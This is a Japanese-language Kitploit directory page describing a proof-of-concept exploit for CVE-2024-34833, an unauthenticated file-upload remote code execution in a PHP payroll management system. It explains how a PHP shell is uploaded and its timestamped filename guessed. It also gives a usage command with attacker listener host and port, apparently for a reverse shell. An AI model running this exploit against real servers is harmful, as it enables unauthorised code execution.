Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-34833-payroll-management-system-rce | Kitploit
ツール/GitHubGitHub/shellunease/cve-2024-34833-payroll-management-system-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubshellunease/cve-2024-34833-payroll-management-system-rce

CVE-2024-34833-payroll-management-system-rce

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
2年前未レビュー

CVE-2024-34833 Payroll Management System RCE(未認証)PoC

https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html に対するファイルアップロードを介したRCEです。ファイル名には分単位の精度でタイムスタンプが前置されます。このスクリプトは、現在・前・次の分のタイムスタンプを使用してファイル名を推測しようとします。

脆弱性の説明

Payroll Management System v1.0では、「save_settings」ページを介してユーザーが画像をアップロードできます。未認証の攻撃者は、この機能を悪用して、代わりに悪意のあるPHPファイルをアップロードできます。アップロードされたファイルは誰でもアクセス可能なフォルダに保存され、ファイル名には分単位の精度でタイムスタンプが付加されますが、これは容易に計算できます。この脆弱性の悪用に成功すると、Webサーバーを実行しているユーザーとして任意のコードを実行できるようになります。

使用例

root@kitploit:~
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https

サンプル動画

ツールをダウンロード